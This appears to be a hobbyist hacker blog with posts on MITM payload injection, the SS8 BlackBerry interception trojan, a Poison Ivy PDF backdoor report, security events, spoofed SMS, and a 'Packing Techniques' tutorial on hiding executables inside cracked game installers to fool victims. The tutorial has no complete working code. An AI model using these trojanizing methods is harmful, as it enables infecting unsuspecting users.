SG Hackers
United Hackers of Singapore!
MITM Injection attacks?
Mar 10th
I read alot about MITM attacks to steal info or right now to do SSL MITM attacks, but maybe I’m ignorant cuz maybe discussed long ago, but I was thinking of MITM to inject malicious data into the stream?
Is it possible to do a MITM, detect for say an installer download or Windows Update for hotfix or update exe, then on-the-fly attach something at the end of the exe, or better still repack the whole exe into 2 exe to be dropped?
WIth something like Paros Proxy or even tcpdump sourcecode, it is possible right? I’ve never tried this b4 so things like is there a TCP checksum? What about reporting filesize, will the browser be confused? I’ve seen browser download file where the filesize is unknown but it still know when to complete the download. Damn I need to know more about TCP/IP and HTTP 
With a proxy or even a wifi access point, it should be I think easy to intercept a webpage, then modify the content and return to browser, but file download then repack the file is I think a much trickier problem.
Something worth exploring 
Game Changers
Mar 10th
Design21 is hosting a game design contest to encourage positive change in people’s lives. Prize money of $2k to be won. Application closes May 11.
—
Game Changers
Design a game that aims to create change by improving lives or inspiring new behaviors.
“The goal of this competition is to come up with the idea and design for a game that can improve lives or inspire new behaviors, whether personally, professionally or communally, to create change. The game could teach an individual or a group new life skills or propose a more sustainable way of living, working or interacting either at home or in our community. It does not have to operate on a grand scale. Small is also welcome. The objective and spirit of the game should be to inspire or create positive change.”
SS8 Interceptor
Mar 1st
Earlier I wrote about the Mobile Secrets java app and how its Secrets were easily revealed via bytecode disassembly. Well I recently got wind of an even bigger java app sexpose, the SS8 Blackberry trojan that the UAE deployed last year and caused a big hoohaa cuz it got sexposed!
I managed to get the java pack only last week so still running thru the code but it old news to others already. The tech websites already talked about it, seems is demo/early version with alot of loophole or features missing. You can read this PDF for a overview.
The key points I extract out for your easy reading! Very interesting and sad… battery drain LOL! I wonder the mobile data bill got can refund anot…
OBSERVATIONS
There are several anomalies in the application that lead to the conclusion that it was either not the version intended for deployment; it was mistakenly rolled out or it was an early release that was being tested.
The reasons for such a conclusion can be argued as:
(1) No capability for intercepting incoming messages.
(2) No possibility of silently updating the application with newer releases.
(3) Lack of comprehensive interception capabilities. Only outgoing email messages.
(4) Several segments of unused source code and references that have been hardcoded into the application. Further observations have been listed below.Disabled Email Control Channel
The email based control channel to send commands to the application is disabled. On further analysis, why it was disabled became clear. When the service-provider sends an email message to activate the application, a copy of this control email would also be delivered to the recipient’s email server. Thus the user would be alerted to possible suspicious activity.Control Channel Messages
Control channel commands are momentarily visible when they are received. Thus a user who happens to be looking at his handheld screen would see a message appear for a fraction of a second and then instantly disappear. This behavior was observed on a BlackBerry handheld but was not apparent on the BlackBerry handheld simulator.Hardcoded References
A standard program that is redistributed will usually have some sort of constants or configuration file. The Interceptor application did contain such a file, however the configuration parameters from the file were not used in the execution of the program. Instead, there were hardcoded references that were used. This is what lead to the conclusion that this version of the application was either a early testing version that was mistakenly deployed or it was a badly modified version of an original file.Battery Drain
The application implements a watcher on all the handheld message folders. This watcher triggers other components whenever a message is received. Despite this, the application polls a function to check if a new message has been received. This constant polling uses processing cycles and thus increases
power consumption. It is very likely that less powerful processors may overheat due to the increased processing activity. This is bad programming practice, especially for handheld devices. It was also the reason users were made suspicious of the program.Heartbeat
Every hour, each handheld will report its status and version information to the central server. This happens regardless of application is installed on the handheld and is named whether the application is intercepting messages or not.Encryption
The Interceptor application makes use of encryption when sending intercepted messages or receiving control commands. It does this by encrypting outgoing messages using AES. The keys are hardcoded into the application. For incoming control commands, the messages are decrypted using the device PIN as the decryption key. The encryption type is still AES.
HITB magazine
Feb 23rd
Hack in the box has revived their magazine and release it last month. Content covered in this release include
- LDAP injection
- DLL injection
- Exception detection on Windows
- Xprobe2-NG
- Malware obfuscation
- Reconstructing Dalvik Applications Using UNDX
https://www.hackinthebox.org/misc/HITB-Ezine-Issue-001.pdf
Other than that, they also release a special report on CTF last year.
https://www.hackinthebox.org/misc/HITB-CTF2009-Special-Report.pdf
flower-show.org
Feb 23rd
Singapore PoisonIvy C&C!
We saw a pretty PDF file today (md5: 116d92f036f68d325068f3c7bbf1d535). It looks like this:
Nice flowers.
Unfortunately, when viewing the file, it uses an exploit against Adobe Reader and drops and runs a file called 1.exe.
This executable is a Poison Ivy backdoor. It calls home to a host called cecon.flower-show.org. Whoever controls the computer at that address gains remote access to the target computer. The PDF was used in a targeted espionage attack against an unknown target.
We’ve seen the domain flower-show.org before, already in 2009. Then another PDF called home to posere.flower-show.org.
Today, both of those host names resolve to 202.150.213.12, which is not in China. It’s in Singapore
http://www.f-secure.com/weblog/archives/00001878.html
All Bout Security
Feb 23rd
The 2nd All ‘Bout Security& Connectivity Seminar is here again in Temasek Polytechnic! This seminar provides a knowledge-sharing platform for IT Security, Network Professionals and students.
The seminar includes talks on IT security and connectivity and a Web Challenge (supported by HITB), which is open to public. The aim of the challenge is to test the contestants on various web penetration techniques.
What’s on in 2010?
This year, the All Bout Security Seminar (5 March 2010) will include an additional seminar series on Connectivity, as well as a Web Challenge (supported by HITB).
Event Details:
Date: March 05 2010
Venue: Temasek Polytechnic Auditorium 1
Time: 12pm – 6pm
Programme List: All ‘Bout Security & Connectivity Seminar:
| Time | Topic | Speaker | Organization | ||
| 12:00 – 13:00 | Registrations and Project Showcase | - | - | ||
| 13:00 – 13:15 | Opening of All ‘Bout Security & Connectivity Seminar 2010 | - | - | ||
| 13:15 – 13:45 | Anatomy of a Security Breach | Unmesh Deshmukh | Symantec Corporation |
||
| 13:45 – 14:15 | The future of IT Security in Singapore | Michelle Lee | Singapore Infocomm Technology Security Authority |
||
| 14:15 – 14:45 | Life After WPA | Yap Chern Nam | Institute of Electrical & Electronics Engineers |
||
| 14:45 – 15:15 | The Art & Science of Hunting Down Wireless Hackers |
Julian Ho | ThinkSECURE Pte Ltd | ||
| 15:15 – 15:45 | Refreshments Break & Project Showcase | - | - | ||
| 15:45 – 16:15 | Hosted Security: complete protection with a peace of mind | Leonard Sim | Symantec Asia Pte Ltd |
||
| 16:15 – 16:45 | Wireless LAN 802.11n Technology and Trends | Wee Keng Tong | Aruba Networks |
||
| 16:45 – 17:15 | Measuring Security Risks with CVSS | Eugene Teo | Red Hat | ||
| 17:15 – 17:45 | Biometrics: From Yesterday to Tomorrow | Lim Eyung |
Biometrics Technical Committee of Singapore | ||
Programme List: Web Challenge (Supported by HITB)
10:00am – 11:00am – Briefing
11:00am – 1:30pm – Play Time
1:30pm – 3:00pm – Lunch & Break
3:00pm – 5:30pm – Challenge Rounds
5:30pm – 6:00pm – Computation of Results
6:00pm – 6:15pm – Announcement of results & Prize Presentation
Web Challenge Details:
Date: March 05 2010
Venue: Temasek Polytechnic Foyer area outside Auditorium
Time: 10am – 6pm
About
The Web Challenge will be organized by the Diploma in Cyber & Digital Security and supported by Hack In The Box (HITB). The Web Challenge aims to be a platform for all to showcase their web penetration testing skills against corporate emulated websites.
Competition Structure
Each participant has a maximum of 20 minutes to complete 4 out of 10 challenges. Upon completion of each level, a separate scoring mechanism will assign the participants a score based on a time-mission scheme (i.e. the faster you complete the levels, the higher your score will be). The challenges will test the contestants on various web penetration techniques including XSS, SQL Injection, Remote File Inclusion, etc.
Who can participate?
This competition will be open to the public.
Prizes
1st – iPod Touch 8GB & Free seat to HITBSecConf2010 – Malaysia (October 2010)
2nd – iPod Shuffle 4GB & Free seat to HITBSecConf2010 – Malaysia (October 2010)
3rd – Free seat to HITBSecConf2010 – Malaysia (October 2010)
Back to the living
Feb 23rd
The site is back up! After weeks of downtime it’s mysteriously up without any word from the webhost? Email from the webhost said that the server died due to hardware failure and since it was brought back up there have been issues with the webserver, most likely data corruption.
The server kept returning php files without rendering them, a MIME type problem it seems. How it happened and why it took so long to fix, your guess is as good as mine.
HushSMS
Dec 11th
Cool WinMo app to share, HushSMS is a freeware that allows you to send all kinds of SMS messages to people, including invisible messages! I discovered about this from Blackhat Europe 2009, from the topic of hijacking mobile communications, using WAP-Push.
Using HushSMS you can even send spoofed SMSes and MMSes to your friends for fun =]
Packing Techniques
Dec 2nd
My friend asked me how viruses can be spread from cracked game exes since he plays DOTA on a pirated Warcraft install on a private network. After I explained it to him, he ask me how come I never blogged about it, what a good question! So today I will blog about some basic methods to packing. I will describe 4 different ways to pack files.
The first is packing using Resource Files, one of the easier ways to do so. In VC++ u can create/import resource files to your VC++ project. That is the easy part. The next part is slightly trickier, u need to extract the resource into a file on the system then somehow execute it. To do that you run the following calls:
hRes = FindResource(…);
hResLoad = LoadResource(…, hRes);
hFile = CreateFile(…);
WriteFile (hFile, …);
With the file created you just do WinExec or something else =)
The 2nd method is similar, but not using Resource Files which can be easy to detect. It requires more work on your part. Basically you need a 2nd program to convert binary data into a string format which you can copy and paste into your VC++ code as a array or string variable. I don’t post code on this cuz there are many ways, eg read 1024 bytes, B64 it, print to output file, or convert to binary-coded string, then B64 it, etc. Bottom line is, convert the binary data to the string. Then your code just reverse it. One note, make sure to strip any trailing padding that some convertor code might add eg B64 likes to add “==” at the end of strings that are too short. Shell code makes use of this technique to hide assembly calls in code.
The 3rd and 4th way are just using existing tools. One way is to use InstallShield. Yes, InstallShield. It gives you a very nice GUI to add files, even to execute which file after unpacking. What you need tho is a original package that used InstallShield, then rebuild the package yourself, except you add in your own files. Simple right?
The 4th way is like the 3rd way, but you might not have InstallShield, cuz later version of VC++ dun have InstallShield free. But you have WinZip, 7-Zip, WinRAR rite? All of them have the ability to create self-extracting archives or SFX. What this SFX is is that it embed the unarchiver program to the SFX then treats the SFX exe as a archive file eg ZIP. A SFX exe you can still open using the archiver tool so it’s not ideal, eg if you created the SFX using WinZip you can open the SFX exe in WinZip and see the contents. Which is still not too bad if you had the original SFX and just re-SFXed it.
You can combine the 1st/2nd techniques with the 3rd/4th techniques, but you need to know how to use ResHacker or a similar tool. The neat thing about 3rd/4th techniques is that with social engineering it might work better since your victim might think since it came from InstallShield or WinZip it is safe =)
There are more advanced techniques eg unpack direct to memory, or using eggdrop instead of unpacking, but I won’t discuss them today =)
26C3 – Console Hacking!
Nov 30th
Like the previous years a bunch of console hackers are getting together at 26C3. We hope to have some table space at the Hackcenter to set up our consoles, show off our hacks, and teach people about them!
The topic extends to many aspects of video game consoles, both software and hardware. This includes breaking the security, using homebrew software, modifying their existing software, hardware modifications and improvements, using custom hardware peripherals with consoles, using console peripherals with custom hardware, and anything else that’s related to video game consoles. A lot of what goes on behind the scenes only happens once or twice, so here’s your chance to learn what it really means to hack a game console, hands-on.
We’ve pretty much conquered the Wii since last year and are currently looking on to the Nintendo DSi and the PlayStation 3. If you always wanted to learn how the Wii’s security was broken using a pair of tweezers, or how to reverse engineer the Wii Remote’s extension encryption and make your own, you might want to stop by and say hi
Also the WiiPhonies team is looking forward to having lots of fun at the CTF event again this year!
Equipment* Xbox 360
* Wii
* PS3
* DSi
* Soldering equipment, scope, Logic Analyzer, FPGA boards
Console hacking! I think a trip down’s worth it just for this! Is my PS3 safe after this? Or are we looking at the first PS3 modchip? Only time will tell =] Anyone going to 26C3?
